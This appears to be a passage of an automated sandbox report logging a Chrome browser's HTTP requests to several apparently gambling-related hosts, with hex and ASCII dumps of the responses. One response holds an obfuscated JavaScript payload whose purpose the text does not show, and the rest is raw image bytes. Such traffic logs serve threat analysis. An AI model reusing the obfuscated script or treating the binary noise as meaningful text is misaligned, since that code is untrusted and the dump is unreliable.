                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: 3c c7 13 35 8f b9 73 f1 8c 86 3e 46 2c f6 72 9b 28 a5 ee cc db 08 a7 cb d5 85 40 ad 3c 75 cb d9 5f 46 b6 fe 6e 62 e6 1e d1 3d a5 a3 90 07 9f 05 d2 de d9 ca 8e cc 28 49 84 bd c0 3b 03 cb 32 ca 21 cb bd a2 cf e0 78 b7 0a e5 f9 3b bb 5b ee 2b ce fe a9 f8 b6 7b 19 79 05 dc 57 26 db 62 cc 18 25 19 0a 93 4a 32 82 0a b0 34 23 5d ce d5 d4 56 fb 9d 59 52 84 64 25 10 e7 50 03 8b 73 38 ae 43 72 d8 2b ed f4 c5 59 4a 26 32 38 69 2f c1 f9 0c 16 78 67 b4 39 6e 7d c4 39 76 6b 88 e4 31 f9 5c 7f b7 96 33 e6 b9 7d 9a 5f 41 16 42 ce d2 dd 67 76 91 ed a4 da ec 0a c0 e5 76 56 bd 07 89 a6 81 71 d4 f6 b6 f7 22 da 70 9b 92 00 2c 34 97 c1 c1 7c b1 c7 8a 35 bf 4e dc d7 b7 35 e1 38 30 04 90 e7 50 6e 04 32 99 70 1f 66 b9 57 2f e0 d9 9e 67 c4 2f b0 79 be 31 c6 1a 47 e4 b7 bf ab 5b 24
                                                                                                                                                          Data Ascii: <5s>F,r(@<u_Fnb=(I;2!x;[+{yW&b%J24#]VYRd%Ps8Cr+YJ&28i/xg9n}9vk1\3}_ABgvvVq"p,4|5N580Pn2pfW/g/y1G[$
                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: 66 a2 84 f5 58 b3 96 d1 4d 6f 29 f1 a0 63 8f 91 2b eb 4f 5d 70 9d 0d bb 7b 97 6d 31 a6 40 83 d8 43 ff 00 3c 57 63 d5 96 5a ad 0e 9c 43 11 f2 5c 05 94 b9 9a de 7b b8 84 a2 2a 35 1d 1c 03 28 1e 80 d3 c7 5e fc 4b 2f 0f 84 01 cc 25 b8 fd dd 85 be 5e d6 4c d4 b7 e9 8d 01 8b fd 37 69 26 63 b4 85 a3 4b 1c 88 17 75 2a 76 37 4f 2d 55 bb fa 83 4c fb 06 22 7c 35 02 47 c9 8a b1 6b 1b 78 55 06 b4 49 87 1d 24 03 f3 70 ba ff 00 da 0e 1f ec 57 31 b4 cc 4a dc cb 9a 60 32 f6 31 89 ef ac 9a d3 19 73 0c f1 ef db dd 85 83 46 46 d2 4d 43 2a f4 ea 3c e9 e7 3d 47 d4 fb c6 c8 22 6e 29 c2 51 91 61 28 02 cf 9b 17 20 83 e1 8f 0c 97 7b b1 f4 fe d1 b9 99 7b 13 a8 24 06 22 44 03 df 80 20 85 9f 78 b8 27 ed fb 82 e0 b1 dc ae eb 9d 73 ec de 4f 2d 71 2e 23 03 83 b1 b1 c5 44 d3 b4 48 b3 4f
                                                                                                                                                          Data Ascii: fXMo)c+O]p{m1@C<WcZC\{*5(^K/%^L7i&cKu*v7O-UL"|5GkxUI$pW1J`21sFFMC*<=G"n)Qa( {{$"D x'sO-q.#DHO
                                                                                                                                                          2024-06-09 22:41:23 UTC384INData Raw: e3 39 54 23 db 00 bb 11 a4 c5 8b 10 dc 8e 9d 24 f9 b5 76 a2 4d 73 8e 32 fe a0 98 2b 3b 6c f7 64 c3 fa ad b3 4f 0c 69 50 41 96 1b 35 97 e9 a2 92 84 80 52 30 a9 d1 e3 44 91 43 8e b6 8e c5 0a 72 0f 56 a4 a9 82 e2 04 bc 43 64 1d b5 18 c7 84 4c 88 cb 36 5c d5 5d e2 55 22 7f a7 01 32 18 cc 06 91 7c cb 3e 91 23 c4 88 84 0b b5 69 68 af 31 45 50 a0 b4 8e dd 49 1e 27 a9 ae b6 f0 0b 21 57 33 4b df 9e ea 76 1d 66 76 72 3f d4 6b aa 67 17 28 d1 65 ee df 76 27 78 d4 aa 40 07 70 9e bd 5b c3 af 4a 56 9a 6c c2 4b c9 59 97 a9 32 3a 2f 83 b0 55 01 7c 29 53 d7 ec d2 74 c2 2e b1 25 ac c9 1b 4a 42 14 0d 46 d8 c1 a9 fc 2b d3 4e 1d 39 89 09 38 d1 19 5c 97 a3 2a 92 13 ec d1 e9 c2 32 89 24 e2 01 c1 0a 44 82 a5 99 bb a9 e5 8e d6 7b c9 83 ce 29 da b7 53 d4 74 1f 8a 9d 47 c3 4a 64 00
                                                                                                                                                          Data Ascii: 9T#$vMs2+;ldOiPA5R0DCrVCdL6\]U"2|>#ih1EPI'!W3Kvfvr?kg(ev'x@p[JVlKY2:/U|)St.%JBF+N98\*2$D{)StGJd
                                                                                                                                                          2024-06-09 22:41:23 UTC3453INData Raw: 2a 23 72 00 3f 6e 82 73 4e 13 68 cd 25 53 b7 78 dd f8 4f 5a fc 35 11 9a 74 56 ec 30 64 a3 6e 05 6a 21 6f 18 ea 07 dc 34 42 14 4b 71 4e 7e a6 e0 24 12 44 c8 24 55 51 27 81 5e 95 0a 48 f0 ad 0e 8b 09 30 51 90 74 3a e6 e5 e4 74 f9 55 0f 8c 9b 69 42 7e ed 0a 45 4c 04 3b d7 50 52 5e ae 99 25 e2 74 92 5e d3 24 8b da 64 19 80 b7 ba 53 71 0a ae c4 7d c5 65 55 af e1 57 eb d3 e0 c0 8d 4e 38 a4 ec 5d 4a a4 c8 cb 3a 44 96 b3 89 a3 0b f2 d9 48 15 5c 10 43 06 50 c6 9e 23 ff 00 6d 86 93 36 6a cd c5 78 55 00 80 d2 e2 a4 5f d6 79 5b 58 2d c4 d6 90 a9 db 49 9a e0 4a ac b4 f0 af 89 35 f5 d2 11 75 2a b4 22 20 27 0c b8 a0 f9 3e 53 91 c8 a4 72 a4 f1 b5 b9 53 bf 1f 0c 5b 81 6a d0 ac 9b aa 58 1f 86 98 06 c1 48 53 11 02 a4 31 8f 17 51 ab 8d f3 bc 65 a3 68 55 47 cb 6e d5 fc b5 f1
                                                                                                                                                          Data Ascii: *#r?nsNh%SxOZ5tV0dnj!o4BKqN~$D$UQ'^H0Qt:tUiB~EL;PR^%t^$dSq}eUWN8]J:DH\CP#m6jxU_y[X-IJ5u*" '>SrS[jXHS1QehUGn


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          670192.168.2.55044754.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC556OUTGET /pc/240516-03/static/js/components/121/logo.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC356INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          ETag: "6645ca5c-a0c"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:00 GMT
                                                                                                                                                          Content-Length: 2572
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 4437389703147364898
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC2572INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 42 67 42 59 42 57 41 58 51 42 6f 42 76 41 49 6e 77 43 55 77 42 4a 61 67 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 30 6d 48 75 52 44 6b 6f 41 53 68 6f 63 6b 49 41 41 52 49 65 41 4a 7a 36 39 71 41 62 67 44 79 59 41 46 59 68 65 41 4f 67 41 6d 49 4e 6e 7a 51 67 41 43 6f 70 51 51 51 69 6e 67 45 39 4d 6f 36 67 48 31 58 49 4a 41 46 6b 55 68 6a 67 42 73 51 61 69 6f 41 4e 79 68 2f 44 68 41 57 41 45 4a 38 41 46 39 78 4e 54 44 46 57 52 51 41 58 69 68 4d 57 68 67 49 4e 6d 70 78 63 6e 38 30 7a 45 7a 61 50 67 73 41 43 33 79 78 4c 49 42 36 45 49 42 78 51 6e 79 43 70 41 7a 39 4e 45 78 2f 41 72 34 30 79 6a 51 6f 41 46 73 6f 36 6e 38 55 41 48 4d 55 59 4d 4d
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABgBYBWAXQBoBvAInwCUwBJagLgDMBXNGAFwEt0mHuRDkoAShockIAARIeAJz69qAbgDyYAFYheAOgAmINnzQgACopQQQingE9Mo6gH1XIJAFkUhjgBsQaioANyh/DhAWAEJ8AF9xNTDFWRQAXihMWhgINmpxcn80zEzaPgsAC3yxLIB6EIBxQnyCpAz9NEx/Ar40yjQoAFso6n8UAHMUYMM


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          671192.168.2.55045390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC607OUTGET /pc/image-pc/index/312/nav/sports/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 46363
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 22 Feb 2022 09:18:50 GMT
                                                                                                                                                          ETag: "6214aa7a-b51b"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE8[4],EU-FRA-paris-GLOBAL1-CACHE24[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465099
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fb0a310663f40dbee014b2f8b14b919a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126901
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 30 2c 20 32 30 32 31 2f 31 32 2f 31 35 2d 32 31 3a 32 35 3a 31 35
                                                                                                                                                          Data Ascii: PNGIHDRuatEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15
                                                                                                                                                          2024-06-09 22:41:23 UTC16384INData Raw: e7 70 01 9a bc 20 0b 67 06 cd 9d 85 82 91 48 0f c1 68 7f 17 ac eb cb 71 6a ba 64 7b b9 7f 1c e1 45 ac 27 50 48 cf f6 0a 64 48 70 c0 f5 8e e9 f8 19 bc 5e 59 a3 e8 5f bb cb 09 07 e4 9b a3 63 8c 95 49 f2 b5 b1 7b e5 fd 15 61 e3 05 1e f6 f3 5c 6b 97 70 db 32 32 a9 48 f6 28 35 70 42 b0 34 e8 0e e1 da 4d 68 14 3d 1a 14 74 b1 62 69 59 d8 24 35 32 0e af 81 ad b7 cf 99 d9 32 3e 0e d1 f7 d2 78 7f 47 fd b1 74 7f a9 ad 51 ab 27 e9 4a da 6c 29 a2 2d 2b 0f b3 ba b4 df f1 b6 73 34 53 2f bd 8d 92 06 65 c2 47 88 d5 28 2f 56 42 6c 55 44 cd 43 02 27 84 62 20 d4 4c 01 23 9b e1 49 15 90 7d 52 8c b2 58 42 b6 9a aa 05 bb 6c 81 32 d4 0b c3 c9 3a f8 e1 2b fb a1 eb f1 27 20 84 e6 61 00 3f 43 9e 7c 11 d5 b9 83 26 94 67 d5 c4 05 57 bc a0 3e 81 53 ea a9 c6 15 5a 9c ea 4d 1a cb 60 dc
                                                                                                                                                          Data Ascii: p gHhqjd{E'PHdHp^Y_cI{a\kp22H(5pB4Mh=tbiY$522>xGtQ'Jl)-+s4S/eG(/VBlUDC'b L#I}RXBl2:+' a?C|&gW>SZM`
                                                                                                                                                          2024-06-09 22:41:23 UTC14211INData Raw: 2d af 21 af 99 a1 24 36 0a bd 75 31 dd 70 f2 6b ed 6d 12 c6 be 71 da 02 4c b7 e5 b0 a5 a3 5f 30 a3 42 ef 43 a1 f7 e5 74 b8 50 4b c9 48 8d db 8a da ea 52 7a ef d5 f0 05 2a 11 1a e8 81 ab bc 0a 25 74 ad 42 c3 23 14 2a 73 42 13 d6 d9 df 8f 67 fe f0 0c f2 2e bf 0c 24 a6 29 dc 73 5b 8f 31 b0 ce 74 58 b2 ed cf 6a 01 8a 74 4a ac 4c bb 60 65 92 c2 dc bd cf fe e2 9b 87 89 20 cf b8 e9 a7 98 39 67 29 52 6a 35 61 9f 24 d7 4f df 4d 65 33 53 e8 18 cd 3b e5 c2 b3 bc e3 6a 2d 13 94 35 3a de 9a cc 3e 0a 1f 65 51 30 d7 25 de 92 5d 5a bf 36 71 36 29 4d ee 3b 0d c7 5f 32 b6 ad 82 20 fb df 81 5e 33 93 9e c3 cf 21 6a 6a b1 7f 16 31 28 63 cd 3f b4 9b d4 4f 56 94 07 ac 0d cd 95 e8 6b 8b d2 a9 f5 08 df 45 56 bc 44 c1 60 46 64 ba f7 e2 82 ac 70 d2 9a 8c b5 32 5e 4a 11 66 6d 02 ca
                                                                                                                                                          Data Ascii: -!$6u1pkmqL_0BCtPKHRz*%tB#*sBg.$)s[1tXjtJL`e 9g)Rj5a$OMe3S;j-5:>eQ0%]Z6q6)M;_2 ^3!jj1(c?OVkEVD`Fdp2^Jfm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          672192.168.2.55045143.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC368OUTGET /pc/image-pc/video/gc_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-6564"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 25956
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 9924853210902192042
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC1139INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: 01 00 00 00 00 00 00 00 00 06 04 05 07 08 02 03 09 0a 00 01 0b 01 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 04 02 03 05 06 01 07 08 00 09 0a 10 00 01 03 03 02 05 01 05 04 07 05 05 05 09 00 00 01 02 03 04 11 05 06 00 07 21 31 12 13 08 41 51 61 22 14 09 71 91 32 15 f0 81 a1 c1 42 23 16 b1 d1 52 62 33 e1 72 24 17 d7 f1 82 73 25 0a 92 43 53 34 44 46 96 37 18 11 00 02 01 03 03 02 03 04 05 08 06 06 09 05 00 00 01 02 03 00 11 04 21 12 05 31 06 41 13 07 51 61 71 22 81 32 23 14 08 91 a1 b1 c1 d1 42 d4 15 f0 e1 52 d2 33 93 62 92 73 24 17 18 72 82 a2 b2 43 63 34 44 54 c2 53 64 35 16 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 e6 92 11 cb f4 fd 29 af ba 66 bf 3f 8e d4 a5 23 d3 49 b7 89 a6 49 a5 2d a7 97 ec d6 0d 30 c6 f5 bf a4 2c 10 a0 14 92 08 20 d2 84 1e 60 8f
                                                                                                                                                          Data Ascii: !1AQa"q2B#Rb3r$s%CS4DF7!1AQaq"2#BR3bs$rCc4DTSd5?)f?#II-0, `
                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: 55 53 eb 67 f6 ff 00 f9 f9 7f c0 d5 a7 c6 be 87 be 4f e3 b6 2b 45 8d 9c f3 60 0b 56 c8 4c 47 5a 91 94 ee 18 0f 3c 94 f5 49 78 d7 6a c1 3d f9 0a 52 ea 68 78 ea 31 bf 16 fe 9c bb 97 6c 2e 6e e4 df fc 1c 6f e3 2a fb 8f f8 50 f5 07 1f 1d 20 4c ce 1a c8 a0 7f 8b 93 f4 9f fd 27 89 d6 88 4f d1 73 ca 40 a0 51 9d 6c 10 00 52 9f d5 3b 85 f7 ff 00 fa b3 5e 3f 8b 7f 4e 2f a6 17 37 fe 4e 2f f1 94 e7 fc aa 7a 85 6b 1c ce 1a ff 00 ed b2 7f 84 a5 2d fd 19 3c a5 47 0f eb bd 84 ff 00 f2 9d c2 ff 00 a5 c3 d7 59 1f 8b 8f 4e 00 ff 00 d1 73 7f e4 e2 ff 00 19 4d ff 00 ca 8f a8 7f fc ce 17 fc ec 9f e1 2b 4c df a2 ef 94 32 d8 71 85 e6 fe 3f ba d3 a9 53 6e 34 fe 4f b8 2a 6d 68 50 a2 90 b4 ff 00 ca d5 05 24 8f 68 d7 9f f1 71 e9 c3 0b 7d cb 9b ff 00 27 17 f8 ca 5a 7e 14 fd 42 56 bf
                                                                                                                                                          Data Ascii: USgO+E`VLGZ<Ixj=Rhx1l.no*P L'Os@QlR;^?N/7N/zk-<GYNsM+L2q?Sn4O*mhP$hq}'Z~BV
                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: bd c6 c5 55 8b 4a 06 d4 fc 81 69 90 13 d0 9e e2 d4 d0 59 15 5a 52 a2 68 a4 8f 4d 63 1a 51 29 b3 80 5c 50 4d f6 72 b0 8b fc 03 fa 6a 2c 4d 49 a9 35 27 d4 f1 3c 39 f1 d1 9e 34 cb 90 05 aa cd ec 86 1a fd f9 c4 df ae 6c 91 68 b7 3c 04 5e f2 7e 09 d3 5a 20 82 90 a1 fc c6 22 1a 15 1e 45 ca 0f 45 6a 17 90 94 23 79 48 7e 63 d7 dc 3f ae 8b e0 f8 04 9f 38 72 79 02 f8 f1 9b a2 ff 00 69 fd bf 05 eb ef 36 1e da ee bf d2 a7 0f 6f 38 f3 37 03 52 98 12 20 60 56 5c a7 38 9e 92 09 ed 1b 7d a5 cb 55 a6 45 78 84 f6 32 1b cc 35 54 f3 22 9c c8 d7 38 7e 24 39 c1 c4 fa 55 99 04 6d b6 6c c9 61 c7 5f 7e e7 0e e3 e9 8d 1c 57 58 7e 1e 78 43 ca fa 9d 89 91 20 dd 16 24 72 ce df f5 50 a2 1f a2 47 43 5e 84 be a2 96 6b bd f7 c2 af 20 21 d8 d2 fa e7 46 c4 a0 df 1c 4c 76 52 fb 86 d5 8c e4
                                                                                                                                                          Data Ascii: UJiYZRhMcQ)\PMrj,MI5'<94lh<^~Z "EEj#yH~c?8ryi6o87R `V\8}UEx25T"8~$9Umla_~WX~xC $rPGC^k !FLvR
                                                                                                                                                          2024-06-09 22:41:23 UTC384INData Raw: 5a 83 83 e1 a7 8d 38 82 15 64 ea 4a 87 b0 f1 d4 70 f4 3f d3 91 f5 b0 a4 bf fb 79 bf bf 53 3f f1 a3 bf ce ab 99 19 5f f6 31 7f 72 89 b1 df a9 f7 97 81 d4 8b 96 e2 5a 9d 0b f8 89 18 56 20 84 a1 04 f0 a9 45 a5 24 fb fd fa 6a 5f 44 7d 38 5d 46 14 9b 7f db cd fd fa 5a fa cb ea 13 0b 0c c8 ee 3f f2 62 fe e5 47 d9 36 e9 e4 3b 99 94 df 33 7c ca eb f9 c6 43 92 4a f9 eb 94 ee d3 31 92 b7 43 2d b0 d2 18 8f 1d 0d b0 c3 0c 30 d2 1b 6d 08 4a 52 84 24 00 38 6b 68 f6 fe 07 1b db fc 5c 5c 37 16 9e 5f 1f 0a ed 45 b9 36 d4 93 72 6e 49 24 92 49 d4 93 5a bf 9e cd e4 79 ee 4e 5e 5f 92 7d fc 84 cd b9 da c0 5c d8 01 a0 b0 00 00 00 03 40 2a 8b ef ce 23 1a d3 7e 67 26 b6 a1 2d c0 c9 16 f1 96 ca 00 01 8b c3 20 2e 42 c0 1c 91 39 a5 07 3f f1 02 fd ba b7 61 64 09 14 c7 e2 bd 3e 15 aa
                                                                                                                                                          Data Ascii: Z8dJp?yS?_1rZV E$j_D}8]FZ?bG6;3|CJ1C-0mJR$8kh\\7_E6rnI$IZyN^_}\@*#~g&- .B9?ad>
                                                                                                                                                          2024-06-09 22:41:23 UTC1408INData Raw: 8c 9b 5a d5 24 3f 35 94 34 e8 2b 45 50 82 54 92 47 0a 26 a7 ed 3a 68 0a 7b c3 df 55 0f 3d ca 5b 7a fc bf 95 48 6f b5 d4 87 14 94 8e 95 57 95 53 fe 2d 4b 41 05 a3 b9 d6 f5 1f 2e 48 59 76 8e a2 85 5f 55 b0 21 89 48 7f a9 e2 42 d6 7a ba 95 5a 15 75 10 3f 0f 4a 86 9c 1b ee 54 8d 2b cd 3c 2a 01 27 e6 34 ff 00 11 85 c9 90 cc 76 c1 2a 79 c4 36 90 39 d5 4a 03 86 85 63 b4 5e b5 c4 11 19 e7 48 47 56 60 2a 73 74 44 b5 5a e0 c1 76 d8 90 fb 61 a5 82 a4 a1 49 3d 26 a5 41 54 aa 8a bd 6b a8 59 26 76 72 6f 5b ff 00 81 e0 f1 60 c7 50 81 76 ed a6 bc 9f 18 8d 98 5a 97 71 42 59 84 a8 2d ac a4 00 0a 94 40 aa 89 3c 02 00 a7 0d 11 87 95 22 49 fe 89 a6 f9 ae 33 19 21 2a 45 de dd 68 93 19 8b 0a c7 8d c5 16 89 25 6b 75 00 4a 0d a8 28 aa 89 f8 94 40 04 a0 83 c3 4e ca c5 e5 25 ab 58
                                                                                                                                                          Data Ascii: Z$?54+EPTG&:h{U=[zHoWS-KA.HYv_U!HBzZu?JT+<*'4v*y69Jc^HGV`*stDZvaI=&ATkY&vro[`PvZqBY-@<"I3!*Eh%kuJ(@N%X
                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: db 2b 47 0e 1b 2c 6c 3a ac 8c aa 42 30 f6 31 06 aa a6 ca 6d 4e c1 b9 81 d9 6f 7e 40 ec a7 85 98 66 75 95 4e ca 6f 70 6c 78 4e 37 b6 8e e2 d1 f1 66 ae 57 69 d6 46 6c f7 87 be 72 2e 4a 9b 7e 31 10 3b 22 6c 45 fc ba 90 85 2e 83 a1 6a 3b 07 b8 3b 87 bc 53 96 97 13 b3 b9 4e e7 c8 e2 e0 58 91 9e 59 72 44 a6 52 a8 ae 5d 05 8c 7b a5 36 54 61 ba e4 0f 10 2a 83 c2 70 3d a2 fc 5c 79 5d d9 c6 76 de 3f 23 3b 48 e1 22 8f 18 c6 23 0c cc 9b 1c dc 49 b6 31 76 75 3b 6c 09 f0 26 a6 7b 86 c4 f8 1b 79 c2 95 9c 5c b6 8b c5 3b ae de db d3 22 7c 8c c6 66 17 b5 13 70 d8 2d 44 52 e2 4a 98 f6 42 ed bd cb 1c 54 47 76 ad 38 e1 78 04 2b e1 24 1e 1a af bf 76 7a b9 8f c9 0e 23 f9 8f 70 c7 cc 31 00 41 e7 65 89 89 22 e0 08 f7 6f 24 8d 40 db a8 d4 69 52 f2 76 9f a4 99 9c 67 f3 59 78 de df
                                                                                                                                                          Data Ascii: +G,l:B01mNo~@fuNoplxN7fWiFlr.J~1;"lE.j;;SNXYrDR]{6Ta*p=\y]v?#;H"#I1vu;l&{y\;"|fp-DRJBTGv8x+$vz#p1Ae"o$@iRvgYx
                                                                                                                                                          2024-06-09 22:41:23 UTC128INData Raw: a5 66 2a 6a 96 ba 47 0d 51 bf 97 7e 20 96 78 f2 3c 8e f2 19 11 6f d8 db 39 2d c9 e6 9b c9 b5 ad 75 f3 0e af 62 37 9d 5a f5 6c 3c 87 e1 d9 e3 93 15 a6 ec b3 0c c6 3d e9 bf 8d 2b 27 96 2d 16 f5 bd 9b cb 1a 25 c1 d8 34 5b 57 e4 fc c7 e9 33 67 9e dc db 9e 4f f4 f0 b5 dd 19 c7 46 28 cc b9 d7 8f 1b 61 4f 67 13 72 c8 ee 2e 31 a6 e4 3f 21 b9 0d e3 ae 63 6e ae dc 21 82 23 18 2a 54 7e 8e d1
